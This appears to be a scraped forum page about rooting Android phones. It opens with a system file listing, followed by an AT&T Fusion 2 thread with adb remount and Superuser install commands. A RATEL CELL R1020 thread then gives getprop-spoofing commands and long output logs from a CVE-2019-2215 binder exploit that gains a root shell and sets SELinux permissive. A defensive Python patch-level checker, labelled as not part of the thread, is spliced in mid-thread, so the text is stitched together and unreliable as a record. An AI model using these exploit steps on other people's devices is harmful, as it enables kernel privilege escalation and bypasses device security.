10,652 mm-qcamera-testsuite-client
26,464 mm-vdec-omx-test
63,620 mm-venc-omx-test
9,800 modempre
205 monkey
313 monkey.jar
89,864 monkey.odex
18,308 mtpd
5,552 ndc
5,660 netcfg
47,764 netd
76,324 netmgrd
5,520 nl_listener
5,376 oeminfo_test
5,584 oem_rpc_svc
32,616 omx_tests
51 6,374 packages.list
51 111,973 packages.xml
18,692 pand
18,112 pcm-bridge
67,860 pcscd
524,288 Phonesky.apk
2,870,672 Phonesky.odex
11,032 PicoTts.apk
12,640 PicoTts.odex
26,720 ping
5,540 PktRspTest
6,916,572 PlusOne.apk
5,932,352 PlusOne.odex
191 pm
313 pm.jar
28,392 pm.odex
3,757,662 pops_atnt.apk
1,511,304 pops_atnt.odex
18,096 port-bridge
700,557 PotterUnlock.apk
77,128 PotterUnlock.odex
139,540 pppd
56,764 ProjectMenuAct.apk
94,408 ProjectMenuAct.odex
313 qcnvitems.jar
125,648 qcnvitems.odex
313 qcrilhook.jar
12,544 qcrilhook.odex
86,836 qmiproxy
33,652 qmuxd
9,760 qrngd
5,564 qrngtest
56 1,950 qwerty.kl
56 2,601 qwerty_m660.kl
142,516 racoon
26,252 radish
57,140 recEvent
9,856 rild
5,588 rmt_oeminfo
10,220 rmt_storage
59,832 run-as
5,392 schedtest
9,748 sdcard
42,404 sdptool
9,860 service
9,956 servicemanager
313 services.jar
1,732,544 services.odex
6,792,432 Settings.apk
883,048 Settings.odex
33,309 SettingsProvider.apk
65,176 SettingsProvider.odex
974,859 SetupWizard.apk
92,928 SetupWizard.odex
82,840 sh
15,014 ShopMusic.apk
3,264 ShopMusic.odex
23,176 shutdownanima
9,828 sleeplogcat
3,858 SmartcardService.apk
28,064 SmartcardService.odex
1,704,489 SoundRecorder.apk
54,480 SoundRecorder.odex
313 sqlite-jdbc.jar
147,632 sqlite-jdbc.odex
81,284 Stk.apk
67,312 Stk.odex
153,434 Street.apk
323,656 Street.odex
5,456 surfaceflinger
56 1,999 surf_keypad.kl
192 svc
313 svc.jar
8,400 svc.odex
10,239,938 Swype.apk
647,512 Swype.odex
609,667 SystemUI.apk
191,344 SystemUI.odex
5,472 system_server
811,688 Talk.apk
514,136 Talk.odex
35,024 TaskManager.apk
20,472 TaskManager.odex
19,817 TelephonyProvider.apk
165,968 TelephonyProvider.odex
30,452 testpcsc
35,268 test_diag
3,444,531 tn70-android-att-7121044.apk
2,756,552 tn70-android-att-7121044.odex
81,544 toolbox
559,282 ToolBox.apk
24,400 ToolBox.odex
15,030 TtsService.apk
37,544 TtsService.odex
51 58 uiderrors.txt
1,580,748 UNO_DEMO_HUAWEI_U8665_EN_NONIGP_ATT_TS_102.apk
552,136 UNO_DEMO_HUAWEI_U8665_EN_NONIGP_ATT_TS_102.ode
5,440 usbhub
5,520 usbhub_init
13,689 UserDictionaryProvider.apk
16,504 UserDictionaryProvider.odex
27,284 v4l2-qcamera-app
5,552 vdc
1,125,753 Videos.apk
1,392,992 Videos.odex
3,171,658 vlingo.apk
2,772,800 vlingo.odex
91,893 VoiceDialer.apk
87,256 VoiceDialer.odex
1,485,636 VoiceSearch.apk
2,391,016 VoiceSearch.odex
64,100 vold
19,377 VpnServices.apk
32,648 VpnServices.odex
9,792 wiperiface_v01
109,465 WISPr_57_Android22_prepaid.apk
66,824 WISPr_57_Android22_prepaid.odex
9,732 wlan_detect
10,416 wlan_tool
408,520 wl_4330
92,564 wmiconfig
31,284 wpa_cli
372,356 wpa_supplicant
1,937,546 YouTube.apk
1,660,664 YouTube.odex
1,973,436 YPMAndroid-release_preload3_6_2990.apk
1,531,032 YPMAndroid-release_preload3_6_2990.odex
282 File(s) 178,328,187 bytes
GOT ROOT? Fusion 2 finally rooted!
RFE said:
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting
Here is the superuser binary along with a working adb packaged together. Just push the apk to the phone once you have the drivers installed.
I shouldn't have to spell it out for you how to apply this root kit.
Enjoy and don't abuse!
>adb wait-for-device
adb server is out of date. killing...
* daemon started successfully *
>adb shell mount -o rw,remount rootfs /
>adb shell busybox --install -s /vendor/bin
>adb install ./Lib/Superuser.apk
2458 KB/s (196640 bytes in 0.078s)
pkg: /data/local/tmp/Superuser.apk
Success
Looking for the rar password
Thanks for posting, however it's asking for a password.
RFE said:
Here is the superuser binary along with a working adb packaged together. Just push the apk to the phone once you have the drivers installed.
I shouldn't have to spell it out for you how to apply this root kit.
Enjoy and don't abuse!
>adb wait-for-device
adb server is out of date. killing...
* daemon started successfully *
>adb shell mount -o rw,remount rootfs /
>adb shell busybox --install -s /vendor/bin
>adb install ./Lib/Superuser.apk
2458 KB/s (196640 bytes in 0.078s)
pkg: /data/local/tmp/Superuser.apk
Success
Rar password?
Will you either release the rar password or post a non-encrypted link please?
I thought I mentioned the password is xda-developers.com ... something easy to overlook if you are skimming the forums.
EDIT: attached recovery image
RFE said:
I thought I mentioned the password is xda-developers.com ... something easy to overlook if you are skimming the forums.
EDIT: attached recovery image
I got this phone for my daughter and wanted to root to make it seem like an ordinary phone to AT&T. That way they won't charge me for having a smart phone. Anyway, it doesn't seem a lot of folks are rooting the Fusion 2. How has yours behaved since you've rooted? Any problems?
Spurs_Redskins said:
I got this phone for my daughter and wanted to root to make it seem like an ordinary phone to AT&T. That way they won't charge me for having a smart phone. Anyway, it doesn't seem a lot of folks are rooting the Fusion 2. How has yours behaved since you've rooted? Any problems?
Even if you root it, that won't stop AT&T from seeing it as a smart phone.
Batcom2
Whenever I try to push the Superuser.apk into the Fusion 2, it keeps saying that
Code:
failed to copy 'superuser.apk' : read-only file system
Okay, so I've obtained root, but I bricked my phone using Rom Toolbox Pro. Can someone please backup their /system folder, so I may try to unbrick my device?
Sent from my NookColor using xda app-developers app
Yup, I'm a friggin moron. Flashed that recovery.img to my system out of habit and ended up bricking mine too. Can someone please upload a stock system.img as well as the original recovery so I can attempt to unbrick this beast? I was trying to root it for a friend. All I get to is the first white AT&T screen and then it freezes, almost like it's stuck in fastboot mode.
Can someone help and rip/upload, or do I have any other options?

[help] ratel cell r1020 rooting

Hello,
I have a device called RATEL CELL R1020 with OS Android 8.0 Oreo.
I tried some applications for rooting this smartphone like KingRoot, KingoRoot, etc. but failed. This device can't unlock its bootloader, so I looked at rooting with an exploit on YouTube, like thomasking. Can anyone here please help me root my smartphone?
4.4.78-perf+ kernel
This attachment is a screenshot of the system.
Thank you
j4nn said:
@arifincaesar, do you have your phone's firmware in a downloadable form? Can you obtain linux kernel source code for your phone?
I could imagine adapting this (exploit source code here) for your phone, but the kernel binary that is running on the phone is a must pre-requisite. Obviously it would be only a temp root.
arifincaesar said:
There is no way to get the firmware of this phone, sir,
and there's no way to unlock the bootloader.
I think the only way to back up the firmware of this device is an exploit, getting root access without UBL.
It just says 4.4.78-perf+
In my opinion, there is no exploit that would not need offsets within the kernel image in advance.
Because of that you need a copy of the kernel binary that is running on the phone.
Obviously it is not possible to back up the kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is a linux kernel running on the phone (android uses the linux kernel) you have legal options to request the corresponding kernel source code, because the linux kernel is distributed under the GPL license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
j4nn said:
In my opinion, there is no exploit that would not need offsets within the kernel image in advance.
Because of that you need a copy of the kernel binary that is running on the phone.
Obviously it is not possible to back up the kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is a linux kernel running on the phone (android uses the linux kernel) you have legal options to request the corresponding kernel source code, because the linux kernel is distributed under the GPL license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Is that a bug, when I had activated OEM unlock in dev options but cannot unlock in fastboot mode?
j4nn said:
In my opinion, there is no exploit that would not need offsets within the kernel image in advance.
Because of that you need a copy of the kernel binary that is running on the phone.
Obviously it is not possible to back up the kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is a linux kernel running on the phone (android uses the linux kernel) you have legal options to request the corresponding kernel source code, because the linux kernel is distributed under the GPL license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Can you help me please?
arifincaesar said:
Can you help me please?
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
j4nn said:
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
Hehe, I keep watching your work on exploits, sir.
If there is a new exploit I'll try it on my phone.
Thanks in advance.
@arifincaesar, try this please:
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
That should try the offsets defined for xz1c. It's a blind try, but let's see.
Please post the log in a text form (copy it via clipboard from the terminal), using the CODE tags in the message (can be used with the # icon in advanced post).
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
I can't believe it, it works bro, I swear :v
Is my phone rooted now?
Nope, I think my phone is not rooted yet..
I checked with Root Checker and it says "sorry root access is not properly installed on this device."
@j4nn here's the output
Code:
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
Cell:/data/local/tmp # cd
Cell:/ # ls
ls: ./cache: Permission denied
ls: ./init: Permission denied
ls: ./init.environ.rc: Permission denied
ls: ./init.rc: Permission denied
ls: ./init.recovery.qcom.rc: Permission denied
ls: ./init.usb.configfs.rc: Permission denied
ls: ./init.usb.rc: Permission denied
ls: ./init.zygote32.rc: Permission denied
ls: ./init.zygote64_32.rc: Permission denied
ls: ./postinstall: Permission denied
ls: ./ueventd.rc: Permission denied
ls: ./verity_key: Permission denied
acct bt_firmware bugreports charger config d data default.prop dev dsp etc firmware lost+found mnt oem persist proc res root sbin sdcard storage sys system vendor
1|Cell:/ #
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
j4nn said:
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
Hehe, thanks for the information, sir..
@arifincaesar, see PM please...
j4nn said:
@arifincaesar, see PM please...
OK sir, thank you very much for helping me.. T_T
PM sent
cve-2019-2215 based temp root exploit for ratel cell r1020
Here is a temp root exploit tailored specifically for the RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporary root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.
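A defender-side companion to the patch-level discussion in this post, added here as an example and not part of j4nn's exploit or the renoshell project: it parses a device's `uname -a` line and its `ro.build.version.security_patch` value and reports whether the patch level predates the Android Security Bulletin of October 2019 (patch level 2019-10-06), which is where the CVE-2019-2215 binder fix shipped for Android. The uname line is the one from the log in this thread; the patch-level strings are constructed from the January 5, 2018 and May 1, 2018 dates the thread mentions. Nothing here touches a device; it is a triage helper for inventory data pulled with `adb shell getprop` and `adb shell uname -a`.

```python
import re
from datetime import date

# Android security patch level that carried the CVE-2019-2215 binder fix
# (Android Security Bulletin, October 2019).
CVE_2019_2215_FIXED_SPL = date(2019, 10, 6)

# "Linux <host> <release> #<build> <flags/date...> <arch>"
UNAME_RE = re.compile(
    r"^Linux\s+\S+\s+(?P<release>\S+)\s+#\d+\s+.*?\s+(?P<arch>aarch64|armv7l|x86_64)$"
)


def parse_uname(line):
    """Return release string, (major, minor) tuple and arch from a `uname -a` line."""
    m = UNAME_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised uname -a line: %r" % line)
    release = m.group("release")
    # "4.4.78-perf+" -> "4.4.78" -> (4, 4); vendor suffixes after '-' are dropped
    numeric = release.split("-", 1)[0]
    major_minor = tuple(int(x) for x in numeric.split(".")[:2])
    return {"release": release, "major_minor": major_minor, "arch": m.group("arch")}


def parse_patch_level(spl):
    """ro.build.version.security_patch is formatted YYYY-MM-DD."""
    y, m, d = (int(x) for x in spl.strip().split("-"))
    return date(y, m, d)


def assess(uname_line, spl):
    """Flag a device whose declared patch level predates the CVE-2019-2215 fix.

    The patch level is the declared state; a vendor may have backported the
    binder fix without bumping it, so a True here means 'investigate', not
    'confirmed vulnerable'.
    """
    k = parse_uname(uname_line)
    patch = parse_patch_level(spl)
    behind = patch < CVE_2019_2215_FIXED_SPL
    return {
        "kernel": k["release"],
        "kernel_major_minor": k["major_minor"],
        "arch": k["arch"],
        "patch_level": patch.isoformat(),
        "cve_2019_2215_unpatched_by_spl": behind,
        "days_behind_fix": (CVE_2019_2215_FIXED_SPL - patch).days if behind else 0,
    }


if __name__ == "__main__":
    # Constructed sample inventory: the uname line from this thread's log,
    # paired with the two patch levels the thread mentions and one post-fix level.
    uname_line = "Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64"
    for spl in ("2018-01-05", "2018-05-01", "2019-10-06"):
        r = assess(uname_line, spl)
        print("%s  kernel=%s  unpatched_by_spl=%s  days_behind=%d"
              % (r["patch_level"], r["kernel"], r["cve_2019_2215_unpatched_by_spl"],
                 r["days_behind_fix"]))
```

The check deliberately keys on the declared patch level rather than the kernel version string, because OEM kernels such as the 4.4.78-perf+ build in this thread carry backports that the upstream version number does not reflect; the kernel fields are returned only so the report can be correlated with a firmware inventory.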
Thread closed per OP request.
MOD ACTION:
Thread reopened per OP's request
j4nn said:
Here is a temp root exploit tailored specifically for the RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporary root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
Yes, it works sir, thank you so much. Here is the log.
But I think there is another problem, I will post it here later.
Code:
Cell:/data/local/tmp $ ./bindershellnew
bindershell - temp root shell using CVE-2019-2215, tailored for RATEL CELL R1020
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffd4316e9b00
MAIN: thread_info_ptr = ffffffd471268000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
Cell:/data/local/tmp # uname -a
Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64
Cell:/data/local/tmp #
Hi there sir @j4nn.
I'm yusuv, a Ratel Cell user. I've been following this thread.
And lately it seems the exploit works as intended.
The thing is, Ratel Cell does not only have the January patch on all the devices. I've tried the exploit and it's stuck on the build number prop and it won't go any further.
Afaik, Ratel has 2 ROM builds: one patch is January, which you built the exploit for, the other one is the May 1, 2018 patch, with also a different build number.
On behalf of Ratel Cell users with the May patch, I'm here to ask you: is there any way for us with the May patch to be able to root our device?
Thanks in advance.
Dear sir @j4nn.
Can you help us with how to install a custom recovery on Ratel Cell? If you are willing to help, we will be very grateful.